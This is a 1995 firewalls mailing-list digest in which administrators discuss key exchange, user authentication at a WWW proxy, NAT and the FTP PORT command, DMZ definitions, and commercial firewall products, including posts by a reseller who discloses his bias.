"Wed, 04 Oct 1995 10:01:03 +0900." <199510040101.KAA17605@vision.postech.ac.kr> Date: Wed, 04 Oct 1995 16:11:05 -0700 From: Gustavo Vegas Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I do not know if anyone has answered this posting, and I think this info may be of general interest to the list, so, here it goes: [extracted from the response to the command lists detail to their listserver] * ------------------------------------------- * INFSEC-L Information Systems Security Forum * ------------------------------------------- * INFSEC-L is for discussions of information systems security and * related issues. Discussions are not moderated. Thus, all messages * sent to the list are immediately distributed to members of the * list. The discussion list is an outgrowth of the "Technology * for the Information Security '94: Managing Risk" at Galveston, TX * (December 5-8, 1994). The main objective of the list is to foster * open and constructive communication among information systems security * and auditing professionals in government, industry, and academic * institutions. Initial subscriptions are screened by listowner to * ensure that only appropriate professionals are subscribed. * * To subscribe to INFSEC-L, send: * * SUBSCRIBE INFSEC-L yourname * * in the body of email message to LISTSERV@ETSUADMN.ETSU.EDU (leave * the subject line blank). * * Participation in this list is not limited to and does not imply * affiliation with East Texas State University (ETSU). Views expressed * in no way reflect the opinions of ETSU administration, its students, * its faculty/staff, and its Board of Regents. * * PLEASE NOTE: Replies are set up to go to the LIST as an aid to * facilitate discussion. You can OVERRIDE the REPLY option by * including a Reply-To: option in the header of mail you send to * INFSEC-L@ETSUADMN.BITNET. * * Monthly notebooks will be maintained. For a list, send LISTSERV at * ETSUADMN the command: INDEX INFSEC-L . For example: * TELL LISTSERV AT ETSUADMN INDEX INFSEC-L or * SEND LISTSERV@ETSUADMN INDEX INFSEC-L etc. * * To UNSUBSCRIBE, send the command: SIGNOFF INFSEC-L to * LISTSERV@ETSUADMN.ETSU.EDU. Please bear in mind that LISTSERV * commands go to the LISTSERV ID, *NOT* to the list! For more * information on LISTSERV, send the command: INFO to * LISTSERV@ETSUADMN.ETSU.EDU. This may be sent TEXT LINE of MAIL, * or in a file. * (BITNET: TELL LISTSERV AT ETSUADMN HELP on CMS, or * SEND LISTSERV@ETSUADMN HELP using JNET, etc.). * ===========================================+=========================== ****** * *** * * * * *** * * * * * * * * * *** *** * Gustavo Vegas Gustavo.VegasMicrochip.COM ********** CAD Systems Administrator Microchip Technology Inc. ******* Chandler, Arizona ===========================================+=========================== From firewalls-owner Wed Oct 4 17:22:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA02669 for firewalls-outgoing; Wed, 4 Oct 1995 17:10:17 -0700 Received: from scifi.maid.com (scifi.emi.net [204.181.45.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA02662 for ; Wed, 4 Oct 1995 17:10:12 -0700 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id UAA06615; Wed, 4 Oct 1995 20:08:33 -0400 Date: Wed, 4 Oct 1995 20:08:33 -29900 From: Nick Simicich Subject: Re: Encryption strength cc: firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Oct 1995, David Miller wrote: > On Tue, 3 Oct 1995, Frank Willoughby wrote: > > > >From padgett's excellent mail: > But this is the crux of the chicken-and-egg problem. How do they > mutually authenticate each other? If they do it with a shared secret or > through prior arrangement a secure channel had to previously exist. If > there is no third pary/shared secret then it's subject to a > man-in-the-middle attack. The new version of IBM's firewall provides this function. To set up a secure channel, you describe the channel, and it cuts a diskette, which you fedex to the other party. > Now if *thats* been solved, I'd be *delighted* to hear about it! I thought that was what the public key distribution stuff was all about. Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com http://scifi.emi.net/njs.html -- Stop by and Light Up The World! From firewalls-owner Wed Oct 4 17:52:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03776 for firewalls-outgoing; Wed, 4 Oct 1995 17:37:20 -0700 Received: from relay-1.mail.demon.net (relay-1.mail.demon.net [158.152.1.140]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA03756 for ; Wed, 4 Oct 1995 17:37:14 -0700 Received: from post.demon.co.uk by relay-1.mail.demon.net id aa22534; 4 Oct 95 13:36 +0100 Date: Wed, 4 Oct 95 13:29:38 PDT From: stuart@loddon.demon.co.uk Subject: WWW & Proxy Servers To: firewalls-digest@greatcircle.com X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Apologies if the following questions has been asked before - if they have, I can't find them ! i) Is/Are there any proxy servers for WWW to restrict access to the WWW on a username basis AND to further restrict use of 'sub-protocols' supported by WWW such as ftp, gopher ... again on a username basis ? ii) If yes to i), can you provide pointers please ? iii) If no to i), is the requirement technically feasible - if so, any clues ? iv) If the above has been done, has it been integrated with strong authentication tokens e.g. SecureID, Digital Pathways or even S/Key ? TIA ------------------------------------- Name: Stuart Broderick E-mail: stuart@loddon.demon.co.uk Date: 10/04/95:13:29:38 This site is not affiliated with any other in demon.co.uk. ------------------------------------- From firewalls-owner Wed Oct 4 19:22:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05661 for firewalls-outgoing; Wed, 4 Oct 1995 19:01:26 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA05654 for ; Wed, 4 Oct 1995 19:01:22 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA01523; Wed, 4 Oct 95 21:53:39 EDT Received: by starlight.ingress.com (4.1) id AA07907; Wed, 4 Oct 95 21:53:58 EDT Date: Wed, 4 Oct 1995 21:53:56 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: RE: BorderWare vs. Firewall-1 Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have sat quietly on this list the past month or two (been reading and posting for almost 2 years) due to huge work loads, but the past few days have started to urk me. I will say that I resell BorderWare for a good part of my living. However, I sell security, and the customers needs are first, not just me pushing my product. With that said, let me post up 3 or 4 messages in one clump. ------ >From: RTATE@folio.com >I am in the process of purchasing a firewall package for the >company I work for. I have narrowed my choices down to >Borderware and Firewall-1. Which is a better choice, and why? Is >there another package out there that is better I may not have >seen? >Thanks in advance for responses!! The first questions that really need to be asked, are what are you protecting, what is your security policy, what are you looking to provide service wise. BorderWare operates as in integrated Firewall and application server, all on one box, running a 'propritary' hardened operating system. The box allows 100% transparent access to the internet for all standard Internet services, with the ability to define custom services. The BorderWare box has no Unix prompt, and no ability to 'screw it up'. It is 100% menu driven. The BorderWare box includes a full sweet of Internet servers (dual DNS, anonymous FTP, POP, WWW, finger, News) all standard. BorderWare also happens to provide IP translation. Firewall-1 is a statefull packet filter VS. BorderWares' application layer approach. Packet filtering can yield a higher packet throughput (please make sure to compare hardware platforms, and limiting link speeds when evaluting packets per second) Packet filtering can often be more flexable as new services develop. While I in know way want to start any kind of flame war, Firewall-1 can 'easily' be installed in insecure fashions without the administrator being aware of this. This is primarily due to running ontop of Sun-OS 'un-hardened', running syslog, allowing login accounts onto the machine (espically prevelent in Netra situations), etc.. Rather than tie up this group any farther, feel free to contact www.border.com to find your local reseller, and talk through these issues with them. -Charles Kaplan From firewalls-owner Wed Oct 4 19:30:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05748 for firewalls-outgoing; Wed, 4 Oct 1995 19:15:21 -0700 Received: from ingress.com (ioma.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA05741 for ; Wed, 4 Oct 1995 19:15:18 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA02744; Wed, 4 Oct 95 22:07:35 EDT Received: by starlight.ingress.com (4.1) id AA07999; Wed, 4 Oct 95 22:07:54 EDT Date: Wed, 4 Oct 1995 22:07:52 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: re: network address translation Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Paul A Vixie >Date: Wed, 04 Oct 1995 00:26:39 -0700 >Subject: re: network address translation >>Frank Senter, Senior Information Specialist >>Missouri Highway and Transportation Department >>P.O. Box 270, Jefferson City MO 65102 >>I've heard there are a couple of commercial network address translators >>available for those of us who were foolish enough to build extensive >>enterprise networks on non-NIC assigned addresses. Does anyone have any >>real-world experience with such a product? >At Usenix LISA a few weeks ago in Monterey, CA, the first booth inside the >front door belonged to a company that sold NAT boxes. They appeared to be >based on some BSD flavour, and they wanted to sell hardware rather than just >a software solution. Now if I could only remember their company name. Ah, >here it is in the vendor directory included with my conference materials: >Border Network Technologies; Borderware Firewall Server; . I have to jump in here, as a BorderWare reseller (not the one in Monterey CA) BorderWare is a SOFTWARE company. They don't manfacturer or recomend hardware. Yes, I bet all the resellers sell hardware (convence, guranteed compatability, etc) BorderWare is a SOFTWARE product. The product is based on a hardened port of BSDi. If you were to have a shell on the machine (not possible), but even if you were, it wouldn't execute your code anyway. The kernel effectivly only talks to its own authenticable applications. >Is it possible to kludge such a product together on a commercial firewall? BorderWare is a commercial firewall, which happens to due IP translation. I just returned from an install of BorderWare at a site that had about 450 hosts, accross 2 domains (xx.dec.com and xx.sun.com), and a mix of class A and C addresses none of which belonged to them (they belonged to dec and sun whom this company had placed out of the box onto there net). The install took about 5 hours including training. The customers first comments back to his boss infront of me were 'excellent performace, I love the box allrleady'. Enough hype. >And lastly, is the cost/effort of implementing such a product <= effort of >renumbering 2k hosts? BorderWare is in my opinion VERY cost effective. Address Translation also gives you a slight twinge of security by obsecurity. Coupled with BorderWares dual name servers ALL internal site information is hidden from the 'hacker' not in itself secure, but a great start. -Charles Kaplan .....a slightly biased BorderWare reseller..... From firewalls-owner Wed Oct 4 19:53:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05796 for firewalls-outgoing; Wed, 4 Oct 1995 19:20:48 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA05789 for ; Wed, 4 Oct 1995 19:20:44 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA03403; Wed, 4 Oct 95 22:13:02 EDT Received: by starlight.ingress.com (4.1) id AA08065; Wed, 4 Oct 95 22:13:21 EDT Date: Wed, 4 Oct 1995 22:13:18 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: NetSP vs ??? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: toon@cem-bb.e-mail.com >Date: Wed, 04 Oct 1995 08:12:27 EDT >I'm always happy when I find overview lists of products or even >comparisons between products. So I asked RPower@MFI.COM already for >the '1995 Internet security survey' and I hope I will get it soon. >So, I liked the response from Luc Vanderschelde (AMDAHL) to Robert >Tate including a list of products and a reference to a comparison. >However the IBM product NetSP Gateway was not in the list. Maybe he >just forgot to mention it. (Hoi, Luc) >The question now is. I've heard a lot of good things about >NetSP Gateway at different places. Are there some clients of this >product on this list, that I can contact to ask them about their >experiences? I would recomend searching the archives of this list. I have seen quite a bit of traffic on thsi subject. Things that stick in my mind: Un-hardened kernel, and the AIX kernel, perhaps the LARGEST (most code=most bug potential) kernel of all firewalls Stock sendmail either requires SOCKS or running in NON-transparent mode VERY expensive both for the required hardware and the software. I think those are the highlites. Remember, if this is protecting wide area, do you really need all the power of an RS6000 for a T1 link ??? or even Ethernet for that matter. -Charles Kaplan .....a biased reseller of the BorderWare firewall server..... From firewalls-owner Wed Oct 4 20:00:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA06218 for firewalls-outgoing; Wed, 4 Oct 1995 19:37:13 -0700 Received: from awadi.com.AU (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA06203 for ; Wed, 4 Oct 1995 19:36:57 -0700 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA18054; Thu, 5 Oct 95 12:04:22 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA10917; Thu, 5 Oct 1995 12:00:52 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9510050230.AA10917@bunya.awadi> Subject: Re: Encryption strength To: njs@scifi.maid.com (Nick Simicich) Date: Thu, 5 Oct 1995 12:00:53 +0930 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Nick Simicich" at Oct 4, 95 08:08:33 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Nick Simicich: > >The new version of IBM's firewall provides this function. To set up a >secure channel, you describe the channel, and it cuts a diskette, which >you fedex to the other party. > How .... ummmmm..... trusting of you. I suppose it really depends on the level of security you are looking for but you did consider that the fedex package may get intercepted? Delivered to the incorrect person (say, the janitor)? Exchanging encryption keys is always a thorny problem since the key _is_ your data security - if it is subverted then your encryption is useless. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Wed Oct 4 20:13:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA06161 for firewalls-outgoing; Wed, 4 Oct 1995 19:35:30 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA06147 for ; Wed, 4 Oct 1995 19:35:24 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id VAA16004; Wed, 4 Oct 1995 21:33:58 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id VAA29187; Wed, 4 Oct 1995 21:34:14 -0500 From: Alan Hannan Message-Id: <199510050234.VAA29187@gaijin.mid.net> Subject: Re: WWW & Proxy Servers To: stuart@loddon.demon.co.uk Date: Wed, 4 Oct 1995 21:34:13 -0500 (CDT) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: from "stuart@loddon.demon.co.uk" at Oct 4, 95 01:29:38 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2328 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good day: ] Apologies if the following questions has been asked before - if they have, I can't ] find them ! The WWW user authentication is a very valid question, one that we have been considering as our firewall systems mature. ] i) Is/Are there any proxy servers for WWW to restrict access to the WWW on ] a username basis AND to further restrict use of 'sub-protocols' supported ] by WWW such as ftp, gopher ... again on a username basis ? I have not seen a large desire to this, however it would certainly be nice to have the capacity to provide filtering on that. I would think it could be hacked into existing http gateways...... ] ii) If yes to i), can you provide pointers please ? Sorry... ] iii) If no to i), is the requirement technically feasible - if so, any clues ? Yes, it is possible, my discussions with people have involved implementing such in a matter where: A) User A from IP Node A authenticates himself B) Entry made in table for User A == Node A C) If no requests from User A in time 'T' then the entry in the table is flushed. C) Until that time, Node A's requests come through no prob. Another thought has been given to doing something of this nature with SSl, and still another with the reference field in the requests, but I haven't spent too much time on it. ] iv) If the above has been done, has it been integrated with strong authentication ] tokens e.g. SecureID, Digital Pathways or even S/Key ? That would be easy to include with step A. I know of two companies that are interested in doing this. However, neither of them have expertise in firewalls, though they do in programming. (ie they're both r&d departments of companies). If you're still interested and don't find an existing product (I know of none) then come to me, and we'll see about maybe putting together a project....... -- Alan Hannan Email: alan@mid.net Network Systems/Security Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 " The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man. " - George Bernard Shaw From firewalls-owner Wed Oct 4 20:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA08415 for firewalls-outgoing; Wed, 4 Oct 1995 20:26:28 -0700 Received: from mail-relay1.cis.yale.edu (mail-relay1.cis.yale.edu [130.132.21.199]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA08402 for ; Wed, 4 Oct 1995 20:26:24 -0700 Received: from capitoline.cis.yale.edu by mail-relay1.cis.yale.edu with SMTP id AA24684 (5.67a/IDA-1.5 for ); Wed, 4 Oct 1995 23:19:00 -0400 Received: from minerva.cis.yale.edu (minerva [130.132.143.250]) by capitoline.cis.yale.edu (8.6.12/8.6.12) with ESMTP id XAA05171 for ; Wed, 4 Oct 1995 23:24:55 -0400 Received: (from adept@localhost) by minerva.cis.yale.edu (8.6.12/8.6.12) id XAA22561; Wed, 4 Oct 1995 23:24:52 -0400 Date: Wed, 4 Oct 1995 23:24:51 -0400 (EDT) From: Ben X-Sender: adept@minerva To: firewalls@greatcircle.com Subject: Re: Encryption strength In-Reply-To: <9510050230.AA10917@bunya.awadi> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > How .... ummmmm..... trusting of you. I suppose it really depends on > the level of security you are looking for but you did consider that > the fedex package may get intercepted? Delivered to the incorrect > person (say, the janitor)? Use the Shamir Sharing algorithm to break the key up into n parts. Send the n parts via n different vectors--phone, USPS, UPS, FedEx, Fax, e-mail, etc. As long as no one gets more than n/2 parts, it doesn't matter if they subvert the key. Ben. ____ Ben Samman..............................................samman@cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf@clark.net http://www.netresponse.com/zldf echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit From firewalls-owner Wed Oct 4 20:55:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA08700 for firewalls-outgoing; Wed, 4 Oct 1995 20:31:43 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA08685 for ; Wed, 4 Oct 1995 20:31:37 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id WAA16794; Wed, 4 Oct 1995 22:30:12 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id WAA29521; Wed, 4 Oct 1995 22:30:28 -0500 From: Alan Hannan Message-Id: <199510050330.WAA29521@gaijin.mid.net> Subject: Re: DMZ definition ? To: dasidwel@us.oracle.com Date: Wed, 4 Oct 1995 22:30:28 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510042317.AA28157@mailsun2.us.oracle.com> from "David Sidwell" at Oct 4, 95 04:09:49 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2469 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The term DMZ grew out of the border area between north and south korea (or was it vietnam, I wasn't alive for either...) We could argue all day about which of the following more exactly fit the definition of a DMZ, but that's what college professors are for :) IMHO a DMZ is any network which sits between two other networks, which, for whatever reason, have a problem with each other. ] Can anyone give me a concise defition of the term Demilitarized Zone, or DMZ See above. ] for short, in connection with firewall terminology ? I am under the belief, ] perhaps incorrectly, that it is used to refer to any kind of screened subnet ] placed between the internal networks and the Internet (or other external ] networks). Agreed. ] A colleague of mine is convinced that it is a separate subnet hung ] off a single firewall machine. That's kind of fuzzy, though it could be constructed that this 'logical' network is between the two other networks. ] 1. ] [ packet ] [ packet ] ] Internet---[filtering]----DMZ subnet----[filtering]---internal ] [ router ] (containing [ router ] networks Yep. ] 2. As above but protected by firewalls instead of packet filtering routers. Yep. ] 3. ] Internet----firewall----internal networks... ] | ] | ] DMZ ] subnet 3 == 1 logically. One could implement a system w/ 3 that did the same thing. ] Finally, does a DMZ implementation always prevent direct IP forwarding from ] Internet to internal nets ? Nope. For whatever reason, network 1) above could allow telnet's from the far left to the far right, and I'd have no problem with it, and would call it a DMZ. (actually, I would have a problem allowing telnets directly into my network, but I'd still whore myself out to the customer if their security policy allowed it. This is where me and the 'experts' part company.) -- Alan Hannan Email: alan@mid.net Network Systems/Security Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 " The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man. " - George Bernard Shaw From firewalls-owner Wed Oct 4 21:00:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA09410 for firewalls-outgoing; Wed, 4 Oct 1995 20:51:24 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA09396 for ; Wed, 4 Oct 1995 20:51:16 -0700 Date: Wed, 4 Oct 1995 23:49:50 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004234950.2104b6a4@hobbes.orl.mmc.com> Subject: re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >The new version of IBM's firewall provides this function. To set up a >secure channel, you describe the channel, and it cuts a diskette, which >you fedex to the other party. Now this will work but the One True Solution will be one in which you can create a secure channel and authenticate *on the fly* over it. This is why I find the netscape mechanosm so appealing - a secure channel is created without needing any authentication. At this point, all you need is a shared secret - no passphrases, no floppy disks fedexing around the world etc. Lotus Notes hierarchy looks good - once the first authentication channel is created, all else *including public key revocation/reissue* can be accomplished. (Too bad the multi-page description is so full of pablum and vagaries - I already know that long keys are good, what I want to know is "how long is long ?" Add in the fact that for SBU, a dial-up PPP might provide an "out of channel" mechanism for a initial trusted *real-time* keyserver (am rapidly coming to the conclusion that if you are not worried about the FBI listeming in, POTS is really a good mechanism for such - after all, Joe's public key is meant to be distributed so you are not worried about Confidentiality, Ma Bell is handling the Availability, so all you need is Integrity to avoid men in the middle. A U-Dial-It is hard to spoof and Caller-ID (FCC said this year everywhere) provides node validation, & once you have a public key you can trust from the host, all else is easy. Naturally, this is just in time for corporate Amurrica to go into a panic over modems when all they need is a (C)LASS capable switch... The fact is I can see where we are going to be and it is a wonderful place. Do expect the vendors to do their homework though so am not going to grind it all the way down - want them to show me they understand the problem. The really funny part is that certification via a trusted central authority is essential. The big difference between this and key escrow is one critical element - the authority will not have any private keys except its own, rather it will be a point of verification. Corporations may serve as their own but in that case there will need to be a means for them to be able to monitor employees - not a matter of civil rights, rather property rights so either they will hold the secret keys or MicroVault (hi Nick) will do a land office business in electronic lockboxes. The marvel of it all is seeing the pieces become available (one of the more fun parts of my job is pointing people with problems at people with solutions. Sometimes the problem people don't know they have one and the solutions people do not know they have one either. Then it's really enjoyable, and lately both sets have been vendors (even more fun). Now if they would just catch on to '70s style hospitality suites... The real message is that what we have is like colour television in 1960. We are not breaking any new ground (and I wish someone would tell the patent lawyers that), all the technology we need is available, is just a matter of putting it all together and watch that peacock spread its tail. Warmly, Padgett ps seems like I saw a reference somewhere to a set of locks (Chubb ?) nigh on 150 years ago that used one set of keys to lock a door, and a second set was required to open it. If things get irritating, I might even research it. From firewalls-owner Wed Oct 4 21:26:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10475 for firewalls-outgoing; Wed, 4 Oct 1995 21:10:40 -0700 Received: from thor.tjhsst.edu (thor.tjhsst.edu [192.65.174.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA10468 for ; Wed, 4 Oct 1995 21:10:35 -0700 Received: by thor.tjhsst.edu (Smail3.1.28.1 #1) id m0t0hcK-00074qC; Thu, 5 Oct 95 04:09 EST Message-Id: To: alan@mid.net, firewalls-digest@greatcircle.com Subject: Re: WWW & Proxy Servers In-reply-to: Your message of "Wed, 04 Oct 1995 21:34:13 EDT." <199510050234.VAA29187@gaijin.mid.net> Date: Thu, 05 Oct 1995 00:09:01 EDT From: "James Croall" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Yes, it is possible, my discussions with people have involved > implementing such in a matter where: > > A) User A from IP Node A authenticates himself > > B) Entry made in table for User A == Node A > > C) If no requests from User A iith the reference field > in the requests, but I haven't spent too much time on it. I've been playing with something like that, for accessing a firewalled WWW Server with proper authentication: A) User A from IP Node A authenticates himself to the server over Basic HTTP Access Authorization using some sort of One-Time password system. B) The server adds an entry to a table: User A : Node A : Authentication method & "password" C) The combination is valid for some time T. If it is used in that time T, the time gets extended. If it is "idle" for T, it is removed from the table. > Another thought has been given to doing something of this > nature with SSl, and still another with the reference field > in the requests, but I haven't spent too much time on it. Hence a user could connect to an acessible machine, authenticate themself, and have access to a proxy server. Of course, this whole system falls apart without some type of encryption ;) >] iv) If the above has been done, has it been integrated with strong authentication >] tokens e.g. SecureID, Digital Pathways or even S/Key ? > > That would be easy to include with step A. The whole system is relatively easy; In fact I implemented it as a little toy a little while ago, adding HTTP Proxy support, S/Key authentication, and SSL (based on the SSLeay package) all on top of NCSA 1.4. As far as I played with it, it seemed to work. If anybody wants to play with it, I can dig up the code. --- jcroall@tjhsst.edu * jcroall@foo.org http://www.tjhsst.edu/people/jcroall/ From firewalls-owner Thu Oct 5 00:00:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA14810 for firewalls-outgoing; Wed, 4 Oct 1995 23:53:43 -0700 Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA14803 for ; Wed, 4 Oct 1995 23:53:40 -0700 Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Thu, 5 Oct 1995 08:51:59 +0200 Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA01429; Thu, 5 Oct 95 08:51:44 +0200 Date: Thu, 5 Oct 1995 08:51:43 +0200 (EET) From: Keinanen Vesa To: Paul A Vixie Cc: firewalls@greatcircle.com, Mike Shaver Subject: Re: Network Address Translation stuff In-Reply-To: <9510042047.AA27158@wisdom.home.vix.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary > address assignments, and accomplishes its goals without any layering > violations -- in particular the user data is never interpreted. This goes > to show that it can be done without searching for PORT verbs in user data. > How is that possible. FTP client announces it's IP address/port to other party using PORT command and then waits for incoming connection to that addrss. In this case host address is non-reachable to outside world. If direct IP-routing is blocked and internal addresses are not announced to outside world, you cannot make host addresses reachable with "DNS tricks" or any other tricks. I still don't think that even IBM can do address translation without modifying FTP PORT command: you either modify PORT command packet-per-packet (as NAT:s seem to do) or you re-create necessary commands (as FTP proxy's do it). VK -- Vesa Keinanen Nasilinnankatu 24 D, 33210 Tampere, Finland Relevantum Oy Phone +358 31 2147200, Fax +358 31 2147402 From firewalls-owner Thu Oct 5 00:13:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA14861 for firewalls-outgoing; Wed, 4 Oct 1995 23:58:00 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA14853 for ; Wed, 4 Oct 1995 23:57:58 -0700 Received: by gw.home.vix.com id AA09604; Wed, 4 Oct 95 23:56:33 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA27394; Wed, 4 Oct 1995 23:56:32 -0700 Message-Id: <9510050656.AA27394@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Thu, 05 Oct 1995 08:51:43 +0200." Date: Wed, 04 Oct 1995 23:56:32 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I still don't think that even IBM can do address translation > without modifying FTP PORT command: you either modify PORT command > packet-per-packet (as NAT:s seem to do) or you re-create necessary > commands (as FTP proxy's do it). The trick is to use an FTP proxy without the client having to know that it's talking to an FTP proxy. With a simple DNS trick and a complicated FTP proxy, you can make these ends meet. The thought of modifying PORT verbs in-stream makes my skin crawl. From firewalls-owner Thu Oct 5 01:52:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA17056 for firewalls-outgoing; Thu, 5 Oct 1995 01:43:54 -0700 Received: from warrane.connect.com.au (warrane.connect.com.au [192.189.54.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA17025 for ; Thu, 5 Oct 1995 01:43:28 -0700 Received: (from root@localhost) by warrane.connect.com.au with UUCP id SAA18783 (8.6.12/IDA-1.6 for Firewalls@GreatCircle.COM); Thu, 5 Oct 1995 18:41:58 +1000 Received: from macbank ([130.2.230.3]) by macquarie.com.au (8.6.12/8.6.12) with SMTP id RAA17371 for ; Thu, 5 